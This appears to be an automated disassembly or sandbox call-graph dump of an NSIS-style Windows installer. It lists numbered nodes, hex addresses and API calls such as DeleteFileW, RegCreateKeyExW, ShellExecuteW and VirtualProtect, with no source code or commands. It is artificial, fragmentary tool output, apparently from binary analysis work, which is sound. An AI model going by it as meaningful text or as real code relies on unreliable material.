GetWindowsDirectoryW lstrcatW 4515->4516 4517 4034ec DeleteFileW 4515->4517 4521 403239 12 API calls 4516->4521 4604 402dee GetTickCount GetModuleFileNameW 4517->4604 4518 4059fb CharNextW 4518->4520 4520->4518 4526 403465 4520->4526 4527 403463 4520->4527 4522 4034b2 4521->4522 4522->4517 4524 4034b6 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4522->4524 4523 403500 4531 4059fb CharNextW 4523->4531 4534 4035b3 4523->4534 4566 4035a3 4523->4566 4525 403239 12 API calls 4524->4525 4529 4034e4 4525->4529 4688 40601a lstrcpynW 4526->4688 4527->4513 4529->4517 4529->4534 4549 40351f 4531->4549 4705 403789 4534->4705 4535 4036ed 4538 403771 ExitProcess 4535->4538 4539 4036f5 GetCurrentProcess OpenProcessToken 4535->4539 4536 4035cd 4537 40575f MessageBoxIndirectW 4536->4537 4541 4035db ExitProcess 4537->4541 4544 403741 4539->4544 4545 40370d LookupPrivilegeValueW AdjustTokenPrivileges 4539->4545 4542 4035e3 4712 4056e2 4542->4712 4543 40357d 4689 405ad6 4543->4689 4548 4063f4 5 API calls 4544->4548 4545->4544 4552 403748 4548->4552 4549->4542 4549->4543 4555 40375d ExitWindowsEx 4552->4555 4558 40376a 4552->4558 4553 403604 lstrcatW lstrcmpiW 4553->4534 4557 403620 4553->4557 4554 4035f9 lstrcatW 4554->4553 4555->4538 4555->4558 4560 403625 4557->4560 4561 40362c 4557->4561 4562 40140b 2 API calls 4558->4562 4559 403598 4704 40601a lstrcpynW 4559->4704 4715 405648 CreateDirectoryW 4560->4715 4720 4056c5 CreateDirectoryW 4561->4720 4562->4538 4632 403863 4566->4632 4568 403631 SetCurrentDirectoryW 4569 403641 4568->4569 4570 40364c 4568->4570 4723 40601a lstrcpynW 4569->4723 4724 40601a lstrcpynW 4570->4724 4573 40603c 18 API calls 4574 40368b DeleteFileW 4573->4574 4575 403698 CopyFileW 4574->4575 4580 40365a 4574->4580 4575->4580 4576 4036e1 4577 405ebb 38 API calls 4576->4577 4577->4534 4579 40603c 18 API calls 4579->4580 4580->4573 4580->4576 4580->4579 4581 4056fa 2 API calls 4580->4581 4582 4036cc CloseHandle 4580->4582 4725 405ebb MoveFileExW 4580->4725 4581->4580 4582->4580 4584 4063a6 wsprintfW LoadLibraryExW 4583->4584 4584->4500 4587 406410 4586->4587 4588 40641a GetProcAddress 4586->4588 4589 406384 3 API calls 4587->4589 4590 4032d3 4588->4590 4591 406416 4589->4591 4590->4504 4591->4588 4591->4590 4592->4507 4593->4509 4595 4062ae 5 API calls 4594->4595 4596 403245 4595->4596 4597 40324f 4596->4597 4598 4059ce 3 API calls 4596->4598 4597->4515 4599 403257 4598->4599 4600 4056c5 2 API calls 4599->4600 4601 40325d 4600->4601 4729 405c1e 4601->4729 4733 405bef GetFileAttributesW CreateFileW 4604->4733 4606 402e2e 4627 402e3e 4606->4627 4734 40601a lstrcpynW 4606->4734 4608 402e54 4735 405a1a lstrlenW 4608->4735 4612 402e65 GetFileSize 4613 402f61 4612->4613 4614 402e7c 4612->4614 4740 402d8a 4613->4740 4614->4613 4617 40320c ReadFile 4614->4617 4620 402fcd 4614->4620 4614->4627 4629 402d8a 6 API calls 4614->4629 4616 402f6a 4618 402f9a GlobalAlloc 4616->4618 4616->4627 4752 403222 SetFilePointer 4616->4752 4617->4614 4751 403222 SetFilePointer 4618->4751 4624 402d8a 6 API calls 4620->4624 4622 402f83 4625 40320c ReadFile 4622->4625 4623 402fb5 4626 403027 36 API calls 4623->4626 4624->4627 4628 402f8e 4625->4628 4630 402fc1 4626->4630 4627->4523 4628->4618 4628->4627 4629->4614 4630->4627 4631 402ffe SetFilePointer 4630->4631 4631->4627 4633 4063f4 5 API calls 4632->4633 4634 403877 4633->4634 4635 40387d GetUserDefaultUILanguage 4634->4635 4636 40388f 4634->4636 4753 405f61 wsprintfW 4635->4753 4638 405ee7 3 API calls 4636->4638 4640 4038bf 4638->4640 4639 40388d 4754 403b39 4639->4754 4641 4038de lstrcatW 4640->4641 4642 405ee7 3 API calls 4640->4642 4641->4639 4642->4641 4645 405ad6 18 API calls 4646 403910 4645->4646 4647 4039a4 4646->4647 4649 405ee7 3 API calls 4646->4649 4648 405ad6 18 API calls 4647->4648 4650 4039aa 4648->4650 4651 403942 4649->4651 4652 4039ba LoadImageW 4650->4652 4653 40603c 18 API calls 4650->4653 4651->4647 4658 403963 lstrlenW 4651->4658 4661 4059fb CharNextW 4651->4661 4654 403a60 4652->4654 4655 4039e1 RegisterClassW 4652->4655 4653->4652 4657 40140b 2 API calls 4654->4657 4656 403a17 SystemParametersInfoW CreateWindowExW 4655->4656 4687 403a6a 4655->4687 4656->4654 4663 403a66 4657->4663 4659 403971 lstrcmpiW 4658->4659 4660 403997 4658->4660 4659->4660 4662 403981 GetFileAttributesW 4659->4662 4664 4059ce 3 API calls 4660->4664 4665 403960 4661->4665 4666 40398d 4662->4666 4667 403b39 19 API calls 4663->4667 4663->4687 4668 40399d 4664->4668 4665->4658 4666->4660 4669 405a1a 2 API calls 4666->4669 4670 403a77 4667->4670 4770 40601a lstrcpynW 4668->4770 4669->4660 4672 403a83 ShowWindow 4670->4672 4673 403b06 4670->4673 4675 406384 3 API calls 4672->4675 4763 40524c OleInitialize 4673->4763 4677 403a9b 4675->4677 4676 403b0c 4678 403b10 4676->4678 4679 403b28 4676->4679 4680 403aa9 GetClassInfoW 4677->4680 4682 406384 3 API calls 4677->4682 4686 40140b 2 API calls 4678->4686 4678->4687 4681 40140b 2 API calls 4679->4681 4683 403ad3 DialogBoxParamW 4680->4683 4684 403abd GetClassInfoW RegisterClassW 4680->4684 4681->4687 4682->4680 4685 40140b 2 API calls 4683->4685 4684->4683 4685->4687 4686->4687 4687->4534 4688->4527 4772 40601a lstrcpynW 4689->4772 4691 405ae7 4773 405a79 CharNextW CharNextW 4691->4773 4694 403589 4694->4534 4703 40601a lstrcpynW 4694->4703 4695 4062ae 5 API calls 4701 405afd 4695->4701 4696 405b2e lstrlenW 4697 405b39 4696->4697 4696->4701 4698 4059ce 3 API calls 4697->4698 4700 405b3e GetFileAttributesW 4698->4700 4699 40635d 2 API calls 4699->4701 4700->4694 4701->4694 4701->4696 4701->4699 4702 405a1a 2 API calls 4701->4702 4702->4696 4703->4559 4704->4566 4706 4037a1 4705->4706 4707 403793 CloseHandle 4705->4707 4779 4037ce 4706->4779 4707->4706 4713 4063f4 5 API calls 4712->4713 4714 4035e8 lstrcatW 4713->4714 4714->4553 4714->4554 4716 40362a 4715->4716 4717 405699 GetLastError 4715->4717 4716->4568 4717->4716 4718 4056a8 SetFileSecurityW 4717->4718 4718->4716 4719 4056be GetLastError 4718->4719 4719->4716 4721 4056d9 GetLastError 4720->4721 4722 4056d5 4720->4722 4721->4722 4722->4568 4723->4570 4724->4580 4726 405edc 4725->4726 4727 405ecf 4725->4727 4726->4580 4832 405d49 lstrcpyW 4727->4832 4730 405c2b GetTickCount GetTempFileNameW 4729->4730 4731 405c61 4730->4731 4732 403268 4730->4732 4731->4730 4731->4732 4732->4515 4733->4606 4734->4608 4736 405a28 4735->4736 4737 402e5a 4736->4737 4738 405a2e CharPrevW 4736->4738 4739 40601a lstrcpynW 4737->4739 4738->4736 4738->4737 4739->4612 4741 402d93 4740->4741 4742 402dab 4740->4742 4743 402da3 4741->4743 4744 402d9c DestroyWindow 4741->4744 4745 402db3 4742->4745 4746 402dbb GetTickCount 4742->4746 4743->4616 4744->4743 4747 406430 2 API calls 4745->4747 4748 402dc9 CreateDialogParamW ShowWindow 4746->4748 4749 402dec 4746->4749 4750 402db9 4747->4750 4748->4749 4749->4616 4750->4616 4751->4623 4752->4622 4753->4639 4755 403b4d 4754->4755 4771 405f61 wsprintfW 4755->4771 4757 403bbe 4758 40603c 18 API calls 4757->4758 4759 403bca SetWindowTextW 4758->4759 4760 4038ee 4759->4760 4761 403be6 4759->4761 4760->4645 4761->4760 4762 40603c 18 API calls 4761->4762 4762->4761 4764 40412a SendMessageW 4763->4764 4765 40526f 4764->4765 4768 401389 2 API calls 4765->4768 4769 405296 4765->4769 4766 40412a SendMessageW 4767 4052a8 OleUninitialize 4766->4767 4767->4676 4768->4765 4769->4766 4770->4647 4771->4757 4772->4691 4774 405a96 4773->4774 4777 405aa8 4773->4777 4776 405aa3 CharNextW 4774->4776 4774->4777 4775 405acc 4775->4694 4775->4695 4776->4775 4777->4775 4778 4059fb CharNextW 4777->4778 4778->4777 4780 4037dc 4779->4780 4781 4037a6 4780->4781 4782 4037e1 FreeLibrary GlobalFree 4780->4782 4783 40580b 4781->4783 4782->4781 4782->4782 4784 405ad6 18 API calls 4783->4784 4785 40582b 4784->4785 4786 405833 DeleteFileW 4785->4786 4787 40584a 4785->4787 4788 4035bc OleUninitialize 4786->4788 4789 40596a 4787->4789 4822 40601a lstrcpynW 4787->4822 4788->4535 4788->4536 4789->4788 4796 40635d 2 API calls 4789->4796 4791 405870 4792 405883 4791->4792 4793 405876 lstrcatW 4791->4793 4795 405a1a 2 API calls 4792->4795 4794 405889 4793->4794 4797 405899 lstrcatW 4794->4797 4799 4058a4 lstrlenW FindFirstFileW 4794->4799 4795->4794 4798 40598f 4796->4798 4797->4799 4798->4788 4800 405993 4798->4800 4799->4789 4807 4058c6 4799->4807 4801 4059ce 3 API calls 4800->4801 4802 405999 4801->4802 4803 4057c3 5 API calls 4802->4803 4806 4059a5 4803->4806 4805 40594d FindNextFileW 4805->4807 4808 405963 FindClose 4805->4808 4809 4059a9 4806->4809 4810 4059bf 4806->4810 4807->4805 4816 40590e 4807->4816 4823 40601a lstrcpynW 4807->4823 4808->4789 4809->4788 4813 405179 25 API calls 4809->4813 4812 405179 25 API calls 4810->4812 4812->4788 4815 4059b6 4813->4815 4814 40580b 62 API calls 4814->4816 4818 405ebb 38 API calls 4815->4818 4816->4805 4816->4814 4817 405179 25 API calls 4816->4817 4820 405179 25 API calls 4816->4820 4821 405ebb 38 API calls 4816->4821 4824 4057c3 4816->4824 4817->4805 4819 4059bd 4818->4819 4819->4788 4820->4816 4821->4816 4822->4791 4823->4807 4825 405bca 2 API calls 4824->4825 4826 4057cf 4825->4826 4827 4057f0 4826->4827 4828 4057e6 DeleteFileW 4826->4828 4829 4057de RemoveDirectoryW 4826->4829 4827->4816 4830 4057ec 4828->4830 4829->4830 4830->4827 4831 4057fc SetFileAttributesW 4830->4831 4831->4827 4833 405d71 4832->4833 4834 405d97 GetShortPathNameW 4832->4834 4859 405bef GetFileAttributesW CreateFileW 4833->4859 4836 405eb6 4834->4836 4837 405dac 4834->4837 4836->4726 4837->4836 4839 405db4 wsprintfA 4837->4839 4838 405d7b CloseHandle GetShortPathNameW 4838->4836 4840 405d8f 4838->4840 4841 40603c 18 API calls 4839->4841 4840->4834 4840->4836 4842 405ddc 4841->4842 4860 405bef GetFileAttributesW CreateFileW 4842->4860 4844 405de9 4844->4836 4845 405df8 GetFileSize GlobalAlloc 4844->4845 4846 405e1a 4845->4846 4847 405eaf CloseHandle 4845->4847 4848 405c72 ReadFile 4846->4848 4847->4836 4849 405e22 4848->4849 4849->4847 4861 405b54 lstrlenA 4849->4861 4852 405e39 lstrcpyA 4855 405e5b 4852->4855 4853 405e4d 4854 405b54 4 API calls 4853->4854 4854->4855 4856 405e92 SetFilePointer 4855->4856 4857 405ca1 WriteFile 4856->4857 4858 405ea8 GlobalFree 4857->4858 4858->4847 4859->4838 4860->4844 4862 405b95 lstrlenA 4861->4862 4863 405b6e lstrcmpiA 4862->4863 4864 405b9d 4862->4864 4863->4864 4865 405b8c CharNextA 4863->4865 4864->4852 4864->4853 4865->4862 5235 4021ea 5236 402bbf 18 API calls 5235->5236 5237 4021f0 5236->5237 5238 402bbf 18 API calls 5237->5238 5239 4021f9 5238->5239 5240 402bbf 18 API calls 5239->5240 5241 402202 5240->5241 5242 40635d 2 API calls 5241->5242 5243 40220b 5242->5243 5244 40221c lstrlenW lstrlenW 5243->5244 5245 40220f 5243->5245 5247 405179 25 API calls 5244->5247 5246 405179 25 API calls 5245->5246 5249 402217 5245->5249 5246->5249 5248 40225a SHFileOperationW 5247->5248 5248->5245 5248->5249 4882 40156b 4883 401584 4882->4883 4884 40157b ShowWindow 4882->4884 4885 401592 ShowWindow 4883->4885 4886 402a4c 4883->4886 4884->4883 4885->4886 5257 4050ed 5258 405111 5257->5258 5259 4050fd 5257->5259 5261 405119 IsWindowVisible 5258->5261 5267 405130 5258->5267 5260 405103 5259->5260 5269 40515a 5259->5269 5263 40412a SendMessageW 5260->5263 5264 405126 5261->5264 5261->5269 5262 40515f CallWindowProcW 5265 40510d 5262->5265 5263->5265 5270 404a43 SendMessageW 5264->5270 5267->5262 5275 404ac3 5267->5275 5269->5262 5271 404aa2 SendMessageW 5270->5271 5272 404a66 GetMessagePos ScreenToClient SendMessageW 5270->5272 5273 404a9a 5271->5273 5272->5273 5274 404a9f 5272->5274 5273->5267 5274->5271 5284 40601a lstrcpynW 5275->5284 5277 404ad6 5285 405f61 wsprintfW 5277->5285 5279 404ae0 5280 40140b 2 API calls 5279->5280 5281 404ae9 5280->5281 5286 40601a lstrcpynW 5281->5286 5283 404af0 5283->5269 5284->5277 5285->5279 5286->5283 5287 40226e 5288 402275 5287->5288 5291 402288 5287->5291 5289 40603c 18 API calls 5288->5289 5290 402282 5289->5290 5292 40575f MessageBoxIndirectW 5290->5292 5292->5291 5293 402870 5315 405bef GetFileAttributesW CreateFileW 5293->5315 5295 402877 5296 402883 GlobalAlloc 5295->5296 5297 40291a 5295->5297 5298 402911 CloseHandle 5296->5298 5299 40289c 5296->5299 5300 402922 DeleteFileW 5297->5300 5301 402935 5297->5301 5298->5297 5316 403222 SetFilePointer 5299->5316 5300->5301 5303 4028a2 5304 40320c ReadFile 5303->5304 5305 4028ab GlobalAlloc 5304->5305 5306 4028bb 5305->5306 5307 4028ef 5305->5307 5309 403027 36 API calls 5306->5309 5308 405ca1 WriteFile 5307->5308 5310 4028fb GlobalFree 5308->5310 5314 4028c8 5309->5314 5311 403027 36 API calls 5310->5311 5312 40290e 5311->5312 5312->5298 5313 4028e6 GlobalFree 5313->5307 5314->5313 5315->5295 5316->5303 5317 4014f1 SetForegroundWindow 5318 402a4c 5317->5318 5319 4041f2 lstrcpynW lstrlenW 4891 401673 4892 402bbf 18 API calls 4891->4892 4893 40167a 4892->4893 4894 402bbf 18 API calls 4893->4894 4895 401683 4894->4895 4896 402bbf 18 API calls 4895->4896 4897 40168c MoveFileW 4896->4897 4898 40169f 4897->4898 4904 401698 4897->4904 4899 40635d 2 API calls 4898->4899 4902 4021e1 4898->4902 4901 4016ae 4899->4901 4900 401423 25 API calls 4900->4902 4901->4902 4903 405ebb 38 API calls 4901->4903 4903->4904 4904->4900 5320 404af5 GetDlgItem GetDlgItem 5321 404b47 7 API calls 5320->5321 5327 404d60 5320->5327 5322 404bea DeleteObject 5321->5322 5323 404bdd SendMessageW 5321->5323 5324 404bf3 5322->5324 5323->5322 5325 404c2a 5324->5325 5326 40603c 18 API calls 5324->5326 5328 4040de 19 API calls 5325->5328 5330 404c0c SendMessageW SendMessageW 5326->5330 5334 404e44 5327->5334 5337 404a43 5 API calls 5327->5337 5357 404dd1 5327->5357 5333 404c3e 5328->5333 5329 404ef0 5331 404f02 5329->5331 5332 404efa SendMessageW 5329->5332 5330->5324 5341 404f14 ImageList_Destroy 5331->5341 5342 404f1b 5331->5342 5352 404f2b 5331->5352 5332->5331 5338 4040de 19 API calls 5333->5338 5334->5329 5339 404e9d SendMessageW 5334->5339 5363 404d53 5334->5363 5335 404145 8 API calls 5340 4050e6 5335->5340 5336 404e36 SendMessageW 5336->5334 5337->5357 5358 404c4c 5338->5358 5344 404eb2 SendMessageW 5339->5344 5339->5363 5341->5342 5345 404f24 GlobalFree 5342->5345 5342->5352 5343 40509a 5348 4050ac ShowWindow GetDlgItem ShowWindow 5343->5348 5343->5363 5347 404ec5 5344->5347 5345->5352 5346 404d21 GetWindowLongW SetWindowLongW 5349 404d3a 5346->5349 5353 404ed6 SendMessageW 5347->5353 5348->5363 5350 404d40 ShowWindow 5349->5350 5351 404d58 5349->5351 5371 404113 SendMessageW 5350->5371 5372 404113 SendMessageW 5351->5372 5352->5343 5362 404ac3 4 API calls 5352->5362 5367 404f66 5352->5367 5353->5329 5354 404d1b 5354->5346 5354->5349 5357->5334 5357->5336 5358->5346 5358->5354 5359 404c9c SendMessageW 5358->5359 5360 404cd8 SendMessageW 5358->5360 5361 404ce9 SendMessageW 5358->5361 5359->5358 5360->5358 5361->5358 5362->5367 5363->5335 5364 405070 InvalidateRect 5364->5343 5365 405086 5364->5365 5373 4049fe 5365->5373 5366 404f94 SendMessageW 5370 404faa 5366->5370 5367->5366 5367->5370 5369 40501e SendMessageW SendMessageW 5369->5370 5370->5364 5370->5369 5371->5363 5372->5327 5376 404935 5373->5376 5375 404a13 5375->5343 5377 40494e 5376->5377 5378 40603c 18 API calls 5377->5378 5379 4049b2 5378->5379 5380 40603c 18 API calls 5379->5380 5381 4049bd 5380->5381 5382 40603c 18 API calls 5381->5382 5383 4049d3 lstrlenW wsprintfW SetDlgItemTextW 5382->5383 5383->5375 5384 100016b6 5385 100016e5 5384->5385 5386 10001b18 22 API calls 5385->5386 5387 100016ec 5386->5387 5388 100016f3 5387->5388 5389 100016ff 5387->5389 5390 10001272 2 API calls 5388->5390 5391 10001726 5389->5391 5392 10001709 5389->5392 5395 100016fd 5390->5395 5393 10001750 5391->5393 5394 1000172c 5391->5394 5396 1000153d 3 API calls 5392->5396 5399 1000153d 3 API calls 5393->5399 5398 100015b4 3 API calls 5394->5398 5397 1000170e 5396->5397 5400 100015b4 3 API calls 5397->5400 5401 10001731 5398->5401 5399->5395 5402 10001714 5400->5402 5403 10001272 2 API calls 5401->5403 5404 10001272 2 API calls 5402->5404 5405 10001737 GlobalFree 5403->5405 5406 1000171a GlobalFree 5404->5406 5405->5395 5407 1000174b GlobalFree 5405->5407 5406->5395 5407->5395 5408 10002238 5409 10002296 5408->5409 5410 100022cc 5408->5410 5409->5410 5411 100022a8 GlobalAlloc 5409->5411 5411->5409 5412 404579 5413 4045a5 5412->5413 5414 4045b6 5412->5414 5473 405743 GetDlgItemTextW 5413->5473 5416 4045c2 GetDlgItem 5414->5416 5449 404621 5414->5449 5422 4045d6 5416->5422 5417 4045b0 5418 4062ae 5 API calls 5417->5418 5418->5414 5419 4048b4 5426 404145 8 API calls 5419->5426 5421 4045ea SetWindowTextW 5425 4040de 19 API calls 5421->5425 5422->5421 5427 405a79 4 API calls 5422->5427 5423 404735 5428 405ad6 18 API calls 5423->5428 5424 40603c 18 API calls 5429 404695 SHBrowseForFolderW 5424->5429 5430 404606 5425->5430 5431 4048c8 5426->5431 5432 4045e0 5427->5432 5433 40473b 5428->5433 5434 404705 5429->5434 5435 4046ad CoTaskMemFree 5429->5435 5436 4040de 19 API calls 5430->5436 5432->5421 5437 4059ce 3 API calls 5432->5437 5476 40601a lstrcpynW 5433->5476 5434->5419 5475 405743 GetDlgItemTextW 5434->5475 5438 4059ce 3 API calls 5435->5438 5439 404614 5436->5439 5437->5421 5440 4046ba 5438->5440 5474 404113 SendMessageW 5439->5474 5443 4046f1 SetDlgItemTextW 5440->5443 5448 40603c 18 API calls 5440->5448 5443->5434 5444 40461a 5446 4063f4 5 API calls 5444->5446 5445 404752 5447 4063f4 5 API calls 5445->5447 5446->5449 5456 404759 5447->5456 5450 4046d9 lstrcmpiW 5448->5450 5449->5419 5449->5424 5449->5434 5450->5443 5453 4046ea lstrcatW 5450->5453 5451 40479a 5477 40601a lstrcpynW 5451->5477 5453->5443 5454 4047a1 5455 405a79 4 API calls 5454->5455 5457 4047a7 GetDiskFreeSpaceW 5455->5457 5456->5451 5459 405a1a 2 API calls 5456->5459 5461 4047f2 5456->5461 5460 4047cb MulDiv 5457->5460 5457->5461 5459->5456 5460->5461 5462 404863 5461->5462 5463 4049fe 21 API calls 5461->5463 5464 404886 5462->5464 5465 40140b 2 API calls 5462->5465 5466 404850 5463->5466 5478 404100 KiUserCallbackDispatcher 5464->5478 5465->5464 5468 404865 SetDlgItemTextW 5466->5468 5469 404855 5466->5469 5468->5462 5471 404935 21 API calls 5469->5471 5470 4048a2 5470->5419 5479 40450e 5470->5479 5471->5462 5473->5417 5474->5444 5475->5423 5476->5445 5477->5454 5478->5470 5480 404521 SendMessageW 5479->5480 5481 40451c 5479->5481 5480->5419 5481->5480 5482 401cfa GetDlgItem GetClientRect 5483 402bbf 18 API calls 5482->5483 5484 401d2c LoadImageW SendMessageW 5483->5484 5485 401d4a DeleteObject 5484->5485 5486 402a4c 5484->5486 5485->5486 4987 40237b 4988 402381 4987->4988 4989 402bbf 18 API calls 4988->4989 4990 402393 4989->4990 4991 402bbf 18 API calls 4990->4991 4992 40239d RegCreateKeyExW 4991->4992 4993 4023c7 4992->4993 4996 40281e 4992->4996 4994 4023e2 4993->4994 4995 402bbf 18 API calls 4993->4995 4998 402ba2 18 API calls 4994->4998 5002 4023ee 4994->5002 4997 4023d8 lstrlenW 4995->4997 4997->4994 4998->5002 4999 402409 RegSetValueExW 5001 40241f RegCloseKey 4999->5001 5000 403027 36 API calls 5000->4999 5001->4996 5002->4999 5002->5000 5004 4027fb 5005 402bbf 18 API calls 5004->5005 5006 402802 FindFirstFileW 5005->5006 5007 40282a 5006->5007 5011 402815 5006->5011 5009 402833 5007->5009 5012 405f61 wsprintfW 5007->5012 5013 40601a lstrcpynW 5009->5013 5012->5009 5013->5011 5487 40427b 5489 4043ad 5487->5489 5490 404293 5487->5490 5488 404417 5491 404421 GetDlgItem 5488->5491 5492 4044e9 5488->5492 5489->5488 5489->5492 5497 4043e8 GetDlgItem SendMessageW 5489->5497 5495 4040de 19 API calls 5490->5495 5493 4044aa 5491->5493 5494 40443b 5491->5494 5496 404145 8 API calls 5492->5496 5493->5492 5502 4044bc 5493->5502 5494->5493 5501 404461 6 API calls 5494->5501 5498 4042fa 5495->5498 5500 4044e4 5496->5500 5518 404100 KiUserCallbackDispatcher 5497->5518 5499 4040de 19 API calls 5498->5499 5504 404307 CheckDlgButton 5499->5504 5501->5493 5505 4044d2 5502->5505 5506 4044c2 SendMessageW 5502->5506 5516 404100 KiUserCallbackDispatcher 5504->5516 5505->5500 5509 4044d8 SendMessageW 5505->5509 5506->5505 5507 404412 5510 40450e SendMessageW 5507->5510 5509->5500 5510->5488 5511 404325 GetDlgItem 5517 404113 SendMessageW 5511->5517 5513 40433b SendMessageW 5514 404361 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5513->5514 5515 404358 GetSysColor 5513->5515 5514->5500 5515->5514 5516->5511 5517->5513 5518->5507 5519 1000103d 5520 1000101b 5 API calls 5519->5520 5521 10001056 5520->5521 5522 4014ff 5523 401507 5522->5523 5525 40151a 5522->5525 5524 402ba2 18 API calls 5523->5524 5524->5525 5526 401000 5527 401037 BeginPaint GetClientRect 5526->5527 5528 40100c DefWindowProcW 5526->5528 5530 4010f3 5527->5530 5531 401179 5528->5531 5532 401073 CreateBrushIndirect FillRect DeleteObject 5530->5532 5533 4010fc 5530->5533 5532->5530 5534 401102 CreateFontIndirectW 5533->5534 5535 401167 EndPaint 5533->5535 5534->5535 5536 401112 6 API calls 5534->5536 5535->5531 5536->5535 5544 401904 5545 40193b 5544->5545 5546 402bbf 18 API calls 5545->5546 5547 401940 5546->5547 5548 40580b 69 API calls 5547->5548 5549 401949 5548->5549 5550 402d04 5551 402d16 SetTimer 5550->5551 5552 402d2f 5550->5552 5551->5552 5553 402d84 5552->5553 5554 402d49 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5552->5554 5554->5553 4293 403c06 4294 403d59 4293->4294 4295 403c1e 4293->4295 4297 403daa 4294->4297 4298 403d6a GetDlgItem GetDlgItem 4294->4298 4295->4294 4296 403c2a 4295->4296 4300 403c35 SetWindowPos 4296->4300 4301 403c48 4296->4301 4299 403e04 4297->4299 4307 401389 2 API calls 4297->4307 4302 4040de 19 API calls 4298->4302 4308 403d54 4299->4308 4363 40412a 4299->4363 4300->4301 4304 403c65 4301->4304 4305 403c4d ShowWindow 4301->4305 4306 403d94 SetClassLongW 4302->4306 4309 403c87 4304->4309 4310 403c6d DestroyWindow 4304->4310 4305->4304 4311 40140b 2 API calls 4306->4311 4315 403ddc 4307->4315 4313 403c8c SetWindowLongW 4309->4313 4314 403c9d 4309->4314 4312 404067 4310->4312 4311->4297 4312->4308 4324 404098 ShowWindow 4312->4324 4313->4308 4316 403d46 4314->4316 4317 403ca9 GetDlgItem 4314->4317 4315->4299 4318 403de0 SendMessageW 4315->4318 4382 404145 4316->4382 4321 403cd9 4317->4321 4322 403cbc SendMessageW IsWindowEnabled 4317->4322 4318->4308 4319 40140b 2 API calls 4332 403e16 4319->4332 4320 404069 DestroyWindow EndDialog 4320->4312 4326 403ce6 4321->4326 4329 403d2d SendMessageW 4321->4329 4330 403cf9 4321->4330 4338 403cde 4321->4338 4322->4308 4322->4321 4324->4308 4325 40603c 18 API calls 4325->4332 4326->4329 4326->4338 4328 4040de 19 API calls 4328->4332 4329->4316 4333 403d01 4330->4333 4334 403d16 4330->4334 4331 403d14 4331->4316 4332->4308 4332->4319 4332->4320 4332->4325 4332->4328 4354 403fa9 DestroyWindow 4332->4354 4366 4040de 4332->4366 4376 40140b 4333->4376 4335 40140b 2 API calls 4334->4335 4337 403d1d 4335->4337 4337->4316 4337->4338 4379 4040b7 4338->4379 4340 403e91 GetDlgItem 4341 403ea6 4340->4341 4342 403eae ShowWindow KiUserCallbackDispatcher 4340->4342 4341->4342 4369 404100 KiUserCallbackDispatcher 4342->4369 4344 403ed8 EnableWindow 4347 403eec 4344->4347 4345 403ef1 GetSystemMenu EnableMenuItem SendMessageW 4346 403f21 SendMessageW 4345->4346 4345->4347 4346->4347 4347->4345 4370 404113 SendMessageW 4347->4370 4371 40601a lstrcpynW 4347->4371 4350 403f4f lstrlenW 4351 40603c 18 API calls 4350->4351 4352 403f65 SetWindowTextW 4351->4352 4372 401389 4352->4372 4354->4312 4355 403fc3 CreateDialogParamW 4354->4355 4355->4312 4356 403ff6 4355->4356 4357 4040de 19 API calls 4356->4357 4358 404001 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4357->4358 4359 401389 2 API calls 4358->4359 4360 404047 4359->4360 4360->4308 4361 40404f ShowWindow 4360->4361 4362 40412a SendMessageW 4361->4362 4362->4312 4364 404142 4363->4364 4365 404133 SendMessageW 4363->4365 4364->4332 4365->4364 4367 40603c 18 API calls 4366->4367 4368 4040e9 SetDlgItemTextW 4367->4368 4368->4340 4369->4344 4370->4347 4371->4350 4374 401390 4372->4374 4373 4013fe 4373->4332 4374->4373 4375 4013cb MulDiv SendMessageW 4374->4375 4375->4374 4377 401389 2 API calls 4376->4377 4378 401420 4377->4378 4378->4338 4380 4040c4 SendMessageW 4379->4380 4381 4040be 4379->4381 4380->4331 4381->4380 4383 40415d GetWindowLongW 4382->4383 4393 4041e6 4382->4393 4384 40416e 4383->4384 4383->4393 4385 404180 4384->4385 4386 40417d GetSysColor 4384->4386 4387 404190 SetBkMode 4385->4387 4388 404186 SetTextColor 4385->4388 4386->4385 4389 4041a8 GetSysColor 4387->4389 4390 4041ae 4387->4390 4388->4387 4389->4390 4391 4041b5 SetBkColor 4390->4391 4392 4041bf 4390->4392 4391->4392 4392->4393 4394 4041d2 DeleteObject 4392->4394 4395 4041d9 CreateBrushIndirect 4392->4395 4393->4308 4394->4395 4395->4393 4396 402786 4397 40278d 4396->4397 4400 4029f7 4396->4400 4398 402ba2 18 API calls 4397->4398 4399 402798 4398->4399 4401 40279f SetFilePointer 4399->4401 4401->4400 4402 4027af 4401->4402 4404 405f61 wsprintfW 4402->4404 4404->4400 4492 100027c7 4493 10002817 4492->4493 4494 100027d7 VirtualProtect 4492->4494 4494->4493 5555 401907 5556 402bbf 18 API calls 5555->5556 5557 40190e 5556->5557 5558 40575f MessageBoxIndirectW 5557->5558 5559 401917 5558->5559 5560 401e08 5561 402bbf 18 API calls 5560->5561 5562 401e0e 5561->5562 5563 402bbf 18 API calls 5562->5563 5564 401e17 5563->5564 5565 402bbf 18 API calls 5564->5565 5566 401e20 5565->5566 5567 402bbf 18 API calls 5566->5567 5568 401e29 5567->5568 5569 401423 25 API calls 5568->5569 5570 401e30 ShellExecuteW 5569->5570 5571 401e61 5570->5571 5577 1000164f 5578 10001516 GlobalFree 5577->5578 5579 10001667 5578->5579 5580 100016ad GlobalFree 5579->5580 5581 10001682 5579->5581 5582 10001699 VirtualFree 5579->5582 5581->5580 5582->5580 5583 401491 5584 405179 25 API calls 5583->5584 5585 401498 5584->5585 5586 401a15 5587 402bbf 18 API calls 5586->5587 5588 401a1e ExpandEnvironmentStringsW 5587->5588 5589 401a32 5588->5589 5590 401a45 5588->5590 5589->5590 5591 401a37 lstrcmpW 5589->5591 5591->5590 5592 402515 5593 402bbf 18 API calls 5592->5593 5594 40251c 5593->5594 5597 405bef GetFileAttributesW CreateFileW 5594->5597 5596 402528 5597->5596 5598 402095 5599 402bbf 18 API calls 5598->5599 5600 40209c 5599->5600 5601 402bbf 18 API calls 5600->5601 5602 4020a6 5601->5602 5603 402bbf 18 API calls 5602->5603 5604 4020b0 5603->5604 5605 402bbf 18 API calls 5604->5605 5606 4020ba 5605->5606 5607 402bbf 18 API calls 5606->5607 5609 4020c4 5607->5609 5608 402103 CoCreateInstance 5613 402122 5608->5613 5609->5608 5610 402bbf 18 API calls 5609->5610 5610->5608 5611 401423 25 API calls 5612 4021e1 5611->5612 5613->5611 5613->5612 5614 401b16 5615 402bbf 18 API calls 5614->5615 5616 401b1d 5615->5616 5617 402ba2 18 API 